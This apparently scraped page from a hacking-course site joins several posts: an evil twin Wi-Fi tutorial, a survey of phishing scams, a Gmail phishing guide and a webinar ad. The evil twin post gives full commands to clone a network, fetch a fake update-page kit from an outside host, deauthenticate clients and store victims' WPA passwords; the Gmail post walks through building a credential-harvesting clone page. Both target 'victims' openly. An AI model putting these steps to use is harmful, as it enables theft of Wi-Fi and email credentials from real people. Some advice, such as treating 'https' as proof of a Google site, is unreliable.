How can you Create an Evil Twin Access Point?

 

Quick intro to Evil Twin:

What is an evil twin access point? Basically, when it comes to security and especially Wi-Fi security, the name evil twin access point arises greatly. Basically, an attacker can imitate an actual Wi-Fi access point for the sake of getting to collect data from whoever attempts to access the network.

Installing a Wi-Fi access point with the same name and settings of another access point, and setting the access point and positioning it next to the impersonated one will most likely cause the victim user to fall in the trap. Since the two access points become twins, in fact, identical twins per say, the user will hardly be able to distinguish between the two access points and will try to access the evil access point as if it is the original one. This is because the signal strengths may be similar or even at times, the evil access point can be having the stronger signal.

Now, there are two cases: it is either the user’s device will connect automatically to an access point, which is in this case the evil access point, or the user will manually choose the stronger access point perceiving it as, the nearer one. In both cases, all the user’s sensitive data such as passwords will get intercepted by the attacker.

What do you need to set up an evil twin access point?

To be able to set up an evil twin access point, there are four main requirements:

  1. Have Kali Linux installed on your machine.
  2. Have a Wireless Network adapter.
  3. Have your machine connected to the Internet.
  4. Have a target access point.

What are the steps to accomplish the desired task?

The following steps work as a concise way to get an evil twin access point prepared for an attack:

  1. Get your Kali Linux machine opened and logged in
  2. Get the Internet connection established between your machine and the host machine.
  3. Get a DHCP server installed on your machine: this can be done by opening the terminal and typing: “apt-get install dhcp3-server “
  4. After the installation is done successfully, get the DHCP server configured with the following command:

“ nano/etc/dhcpd.conf”

A blank file should get opened into the terminal right away after executing this command.

  1. Inside the blank file, type the following, type the following lines as they are:

authoritative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.1.255;

option routers 192.168.1.129;

option domain-name-servers 8.8.8.8;

range 192.168.1.130 192.168.1.140;

}

  1. Save the file by pressing on ctrl+x and then press ‘y’
  2. You get to set the security update page downloaded; this page is the one which will appear when the user opens the browser. To be able to accomplish this task, you should change the directory to /var/www. You can simply type the following command for this sake:

“cd /var/www”

  1. Now that you changed the work directory, you get to type the following commands in their order:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

  1. Get the apache server opened now and mysql as well. The following commands respectively should do this task for you:

/etc/init.d/apache2 start

/etc/init.d/mysql start

  1. Get a database created to be able to store the users’ WPA/WPA2 passwords when they enter the security update page. The following commands are very effective to do this task for you now:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

Don’t close the MySQL page or terminal after this step.

  1. Get to know the interface name of the local network adapter and know the local IP as well. To do that, get a new separate terminal opened and type the following commands inside it:

ip route

airmon-ng

airmon-ng start wlan0

clear

when you type the first command of this list: (take note of local IP n wired interface): the interface name is the one which appears after “eth0” and the local IP appears after “src”

  1. Type the following commands now:

airodump-ng-oui-update

airodump-ng -M mon0 (take note of the target essid,bssid and channel number which all appear after this command)

airbase-ng -e [ESSID] -c [ch. #] -P mon0 (such that [ESSID] is your target’s ESSID and [ch. #] is the target’s channel no which you took note of after the previous command)

  1. Now, the evil access point is awesomely running. However, we need to get to configure our tunnel interface to be able to create a bridge between our evil twin access point and the wired interface. The name of our tunnel interface is at0. This was essentially created when we used “airbase” in the last step. To make such configurations, get a new separate terminal opened without closing neither the MySQL nor the airbase terminals. The following command should be typed into the new terminal now:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

  1. A routing table has to be added now such that IP forwarding gets enabled. This way, traffic can go into and from our evil access point successfully. The following commands should be typed respectively to get this task done:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/iscdhcp-server start

  1. Perform a De-authentication attack now. This will make it compulsory for all the connected clients to connect to the evil twin access point. We need first of all to get a blacklist file created, to contain BSSID of the target. The following command will be doing this task for you:

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

  1. Get back to the airbase terminal; there you will know whether a user is connected to the evil twin access point. He will have entered his WPA/WPA2 password by then. To view this password, get back to the MySQL terminal and type the following commands:

use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our MySQL database}

  1. Congratulations! You have created the evil twin access point successfully.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Sources:

www.hacking-tutorial.com/hacking-tutorial/how-to-create-evil-twin-access-point/#sthash.rDbO247S.dpbs

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.  
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.    
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!

How to understand phishing scams?

 

So, what about phishing scams?

Phishing is one of the most common social engineering attacks that has risen these days.

The following list provides some a few social engineering scams executed via phishing:

  1. Banking Link Scam:

Someone could easily send you an email to trick you to reveal some vital information about yourself. Even one may send a phony link to your bank to you such that you start to believe that your real bank sent it to you. Then, you will feel tempted to enter your user-name and password. In 2015, a campaign named Carbanak was able to get about around a billion dollars from over 30 countries. This information was found by Kaspersky. That is phishing.

What happened precisely is that spear phishing was highly depended on. As a result, workstations got infected through the help of their employees. Hackers were capable of tunneling more rooted into the bank’s systems, taking control over employee stations. This for sure allowed them to manage to transfer cash, to operate ATMs in a remote manner, get the information changed for different accounts, and do some other playful tricks on the reports.

The problem which occurred at that time was primarily due to a phishing email sent to some employees as if it was one of their colleagues who posted it. However, there was a malicious code right behind the scenes. It was able to spread from there widely. In the meantime, everything that happened on the victims’ machines was recorded by the attackers for future use. When proper time came, the attackers could understand everything in the system and get to know what things go where. This made it pretty easy for them when it came to doing several transactions among which was the ATM hits. In addition to that, inflating bank balances then siphoning off that amount was something on the scene such that an account balance for a customer might go from $20,000 to $100,000 and the $80,000 were the earnings of the hacker.

 

  1. Fax Notice Scam:

A phony link to a fake fax is all that it is. However, the damage is enormous when it occurs to your computer as a result. This type of scams appears significantly when it comes to dealing with companies that substantially rely on faxes. Firms that heavily utilize faxes are exemplified by document management firms, title companies, and other companies for insurance and other financial services.

 

  1. Dropbox Link Scam:

Even Dropbox has its surprises with regards to scams. Some security incidents occurred through the year 2014. In one of the cases, what happened is that there was a phishing email sent to victims, asking them to click on a fake link to reset their Dropbox password. After clicking the link, it led the users into a page. There, they faced a warning from the browser saying that their browser is out of date and they need to update it. There was a button where users needed to press to run their update. However, this was the trigger for a Trojan in the Zeus family of malware. Additionally, there was another phishing attack that used Dropbox. Emails were sent to victims having some Dropbox links. On clicking on such links, malicious software like “CryptoWall” ransomware got into the systems.

 

  1. Court Secretary Complaint Link Scam:

This is another phony link which hackers use to trick a customer who falls as a victim of phishing. It is a link that confirms a customer’s complaint. For instance, a phishing email of that sort may include a kind of prediction that a consumer is willing to complain about something very soon. The one who sends the email attempts to grasp the problems that the customer has to further work on them. Using this kind of phishing was in fact very common for quite some time.

 

  1. Facebook Message Link Scam:

This type of phishing trick mainly appears at the time of death time of a celebrity. A link is sent through Messenger or shared through different pages that daisies will be pushed up from the computer through a click on the proposed link.

One vivid example of this occurred when Robin Williams died. Unfortunately, a phishing message through Facebook was hugely widespread among different users tempting them to open a link to watch the Robin Williams goodbye video. The phishing message was really to the point such that even they added more flavor to the title of the link to indicate that it is an exclusive video of Williams saying goodbye through his cell phone. When the user clicked the link, the link drove them into a bogus BBC website page which had nothing but some bad links leading to scam online surveys.

How is it possible for an attacker to attract more victims to the counterfeit website?

There are in fact many methods which an attacker utilizes to get more victims to visit the fake website. Among these methods, the following four tricky methods exist:

  1. The attacker shortens the phishing website to the minimum appropriate length.
  2. The URL gets several shares on social media websites such as WhatsApp and Viber. It is more likely that people will have the incentive to get through these phishing links there because there is no shared awareness of computer security among the users of these social groups.
  3. Many use mostly social engineering here such that people will fall into the trap and open the links.
  4. URLs are sent by the attackers to the victims through emails especially from female names.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Sources

https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack

Hacking GMail Using Phishing Method and Prevention

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.  
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.    
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!

How to Hack Gmail using Phishing Method

 

In fact, a key answer to the proposed question in this article’s title is Wapka. So what is Wapka? It is a free platform for website creation. By using it, Gmail id, browser and IP address of a victim could be all sent. Through this website, a phishing website could be created easily without any much knowledge about PHP or MySql.

 

What do I have to get before getting into the steps?

You have to be aware of the following points before starting the steps which are to be discussed later on in this article:

1. You have to have an email account to be able to register on Wapka

2. You have to be knowledgeable of HTML to some extent.

3. You have to be knowledgeable of Gmail to some extent.

4. You also should be somehow aware of website creation.

5. You have to have a victim as a target for this attack.

What are we about to do now?

We are to create a website that looks exactly like Gmail mobile website. Then, we will receive the victim’s passwords, email id, IP address and browser information, through our email id.

 

Let’s discuss the detailed steps now:

1. Open the Wapka website and get a new account registered on the site.

2. Now, get logged into your new account and navigate through the Site List to create a new one.

3. Type the name of the site, noting that all characters should be in the range of characters a to z  and numbers 0 to 9. Special characters are not allowed.

For example, you can create a username:  newgmail21 and make it @wapka.mobi

4. After clicking “submit”, this should drive you to a screen with two options: either an Admin Mode or User Mode. You should click on “Admin Mode”.

5. A blank page should now appear, which is simply your site to which you have done nothing so far. To start editing your site, click on the link:: EDIT SITE(#):: This link is at the lower rightmost corner of the screen.

6. Click on the Mail form out of all the options which appear to you now.

7. A new screen will appear. You should uncheck “Enable CAPTCHA pictures”.

Now, click “submit”. Also, remember not to set it in admin mode.

8. To make your email id as the destination where the victim’s details will be sent, you need to do the following:

A. Navigate through the site list and click with the cursor on your website name. Without choosing the Admin Mode, you need to scroll down and hit “Source code viewer.”

B. Inside the box, you should type the link to your site. There should appear a screen with some code, search for the word “value=” and take note of the number right beside it.

C. Make the mail form hidden the Admin mode. This could be simply done through the next step, but this is after getting the value=’XXXX..” code.

D. Now click on your site, then choose the Admin mode. You should have a blank site again like what happened before, and now you should also click on “Edit Site”. Afterward, click on              “Users”.

E. Click now on items visibility, and then you should select X from the drop-down menu.

F. Now, download the following code from this link:

https://www.hacking-tutorial.com/tools/subscribers/index.php?id=hckgml

G. Click on your site again and press the Admin Mode. Now, you should press Edit site and choose “WML/XHTML code”. You should now make use of the code you have just downloaded; copy paste it into this section of WML/XHTML code.

I. Remember to get the value=”XXX..” in the code replaced by the one you extracted just now.

9. Now the phishing website is ready as a design, appearance, and even functionalities. Any victim’s details should now get sent to your email which you used while registering on the Wapka website. The email will be received from [email protected] The details that will be sent should include: User-name and password With IP Address and Browser used by the victim.

10. Congratulations! You can now hack the Gmail account. Well done.

 

Where can’t I use Wapka?

There are two locations where the use of Wapka is impossible:

1. Facebook: any Wapka URLs get blocked by Facebook before sharing them. That’s because people on Facebook try to save their clients to the most possible levels.

2. India: the government there blocked the use of this website inside the country. Even surfing the website is impossible inside India. However, they forgot how a proxy site could do all the magic as mentioned earlier no matter whether the website is blocked in a country or not.

 

How can one prevent himself/herself from getting hacked through Gmail phishing?

1. First of all, you’ve got to make sure that the URL starts with “https” in the URL bar. This ascertains that it is a Google site.

2. If there is a link which refers to any “Free Offer, Free Lottery, Free Insurance, Free Net” etc., it is very highly recommended not to click on the link because it may be a phishing site. This is so common on social media websites such as Whatsapp, or even text SMS messages.

3. Don’t press links sent to you in the email just because a girl has sent it to you. This is actually one of the commonly used phishing methods to trick male guys and motivate them to open the link. This method is one of the trickiest methods of social engineering.

4. So, in a nutshell, try not to get yourself into social engineering to avoid being a victim of phishing in general and Gmail Phishing in particular.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Sources

https://www.hacking-tutorial.com/hacking-tutorial/hacking-gmail-using-phishing-method-and-prevention/#sthash.4LzmArQ2.RNipUpcm.dpbs

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.  
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.    
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!

Exploit Development webinar FREE!

Exploit developmentIn this FREE webinar Joe McCray will cover the fundamentals of exploit development and modifying public exploit code on penetration tests. People will little to no exploit development or programming experience, are the ones for whom Infosecaddicts designed this webinar. However, people from the information security field are also welcome to join.

About Joe McCray:

Joe McCray has been teaching IT Security since 2005 and it finally hit him. While he was helping by offering hands-on labs, and no death by PowerPoint in his classes. He realized that in order for him to be a good teacher he needed a more compact and complete training program.

This webinar will be held on the 22nd of February at 1pm EST.

Click the link below to sign up for this webinar:

https://attendee.gotowebinar.com/register/5628748955745369601

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

To check out all our free courses you can click here

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.  
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.    
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!